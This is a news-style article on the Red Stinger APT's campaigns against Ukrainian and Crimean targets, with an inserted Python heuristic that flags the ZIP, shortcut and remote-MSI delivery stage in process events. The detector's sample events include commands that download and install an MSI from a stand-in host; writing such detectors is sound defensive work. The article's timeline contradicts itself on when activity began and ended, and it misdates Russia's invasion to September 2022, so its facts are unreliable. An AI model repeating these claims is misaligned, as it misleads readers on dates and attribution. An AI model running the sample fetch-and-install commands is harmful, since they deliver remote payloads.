Since December 2020, a threat actor tracked as Red Stinger has been responsible for several advanced persistent threat (APT) campaigns against military, transportation, and critical-infrastructure targets in Eastern Europe. The cybersecurity company Malwarebytes has revealed that Red Stinger targeted entities involved in the September East Ukraine referendums and, depending on the campaign, stole sensitive data such as screenshots, the contents of USB drives, keystrokes, and microphone recordings.
The APT group, which overlaps with another threat cluster known as Bad Magic, has targeted government, agriculture, and transportation organizations in Donetsk, Lugansk, and Crimea since 2020. The first known operation occurred in December 2020, with evidence suggesting that the group may have been active since at least September 2021. The group's last recorded activity took place in September 2022, which was also the beginning of Russia's armed invasion of Ukraine.
On compromised machines, the attack chain drops the DBoxShell (PowerMagic) implant via fraudulent installer files: a Windows shortcut inside a ZIP archive is used to download the MSI file. The group has also used alternative implants such as GraphShell, which uses the Microsoft Graph API for command-and-control (C&C).
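The delivery stage above (ZIP archive, shortcut, remote MSI download) leaves a recognisable trace in process-creation telemetry. The following added example, which is not code from Malwarebytes or the report, shows a small heuristic classifier run over constructed process-creation events. The event field names, the temp-path pattern, and the rule names are assumptions of this example, loosely modelled on Sysmon/EDR process-creation records, not on anything in the report.

```python
"""Heuristic flags for the ZIP -> shortcut -> remote MSI delivery stage.

Added example (not from the Red Stinger report). Field names, path
patterns and rule names are assumptions; the sample events are constructed.
"""
import re
from dataclasses import dataclass
from typing import List, Dict

# A remote package reference anywhere in the command line.
REMOTE_URL = re.compile(r"\bhttps?://[^\s\"']+", re.IGNORECASE)
# Where archive tools usually extract ZIP contents before a shortcut is
# double-clicked (assumption: per-user Temp directory).
TEMP_PATH = re.compile(r"\\AppData\\Local\\Temp\\", re.IGNORECASE)
# Script hosts a shortcut typically launches when it needs to fetch a file.
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe",
                "mshta.exe", "wscript.exe", "cscript.exe"}


@dataclass
class ProcEvent:
    image: str          # full path of the newly created process
    cmdline: str        # its command line
    parent_image: str   # full path of the parent process


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(ev: ProcEvent) -> List[str]:
    """Return the names of every heuristic the event matches (may be empty)."""
    findings: List[str] = []
    image = basename(ev.image)
    parent = basename(ev.parent_image)

    # 1. The Windows Installer asked to fetch the package from a URL.
    if image == "msiexec.exe" and REMOTE_URL.search(ev.cmdline):
        findings.append("msiexec_remote_package")

    # 2. The Windows Installer run on a package sitting in the temp dir,
    #    which is where archive-extracted files usually live.
    if image == "msiexec.exe" and TEMP_PATH.search(ev.cmdline):
        findings.append("msiexec_from_temp")

    # 3. A script host started straight from the shell (as a double-clicked
    #    shortcut does) with a remote URL on its command line.
    if image in INTERPRETERS and parent == "explorer.exe" \
            and REMOTE_URL.search(ev.cmdline):
        findings.append("interpreter_from_shell_with_url")

    return findings


def scan(events: List[ProcEvent]) -> Dict[int, List[str]]:
    """Map event index -> findings, keeping only events that matched."""
    return {i: f for i, ev in enumerate(events) if (f := classify(ev))}


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\msiexec.exe",
              r"msiexec.exe /i https://example.invalid/update.msi /qn",
              r"C:\Windows\explorer.exe"),
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r'powershell.exe -NoProfile -Command "Start-BitsTransfer https://example.invalid/update.msi"',
              r"C:\Windows\explorer.exe"),
    ProcEvent(r"C:\Windows\System32\msiexec.exe",
              r"msiexec.exe /V",            # normal Windows Installer service start
              r"C:\Windows\System32\services.exe"),
    ProcEvent(r"C:\Windows\System32\msiexec.exe",
              r'msiexec.exe /i "C:\Users\u\AppData\Local\Temp\Rar$DI01\setup.msi"',
              r"C:\Windows\explorer.exe"),
]

if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_EVENTS).items():
        print(idx, basename(SAMPLE_EVENTS[idx].image), hits)
```

Each rule on its own produces noise on a busy fleet (software deployment tools also pass URLs to msiexec), so in practice these flags are tuned with allow-lists and correlated with the archive download that preceded them rather than alerted on directly.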
The group used tools including ngrok, rsockstun, and a binary that exfiltrates victim data to a Dropbox account under the attacker's control. Although the full scale of the infections is unknown, evidence suggests that two victims, a military target and an official working at a critical facility, were compromised in February 2022 in central Ukraine. In both cases, after a period of observation, the attackers stole screenshots, microphone recordings, and office documents.
The motivations behind the attacks remain unknown, although the attackers infected their own Windows 10 machines in December 2022, likely for testing purposes. The group's use of the Fahrenheit temperature scale and of English as their primary language shows that native English speakers were involved.
The researchers contend that it is difficult to attribute the attacks to a particular nation, since some victims supported Russia while others supported Ukraine. The main goals of the attacks were surveillance and data collection, and the perpetrators employed a range of protective measures and capable tools. The attacks were aimed at specific, hand-picked entities.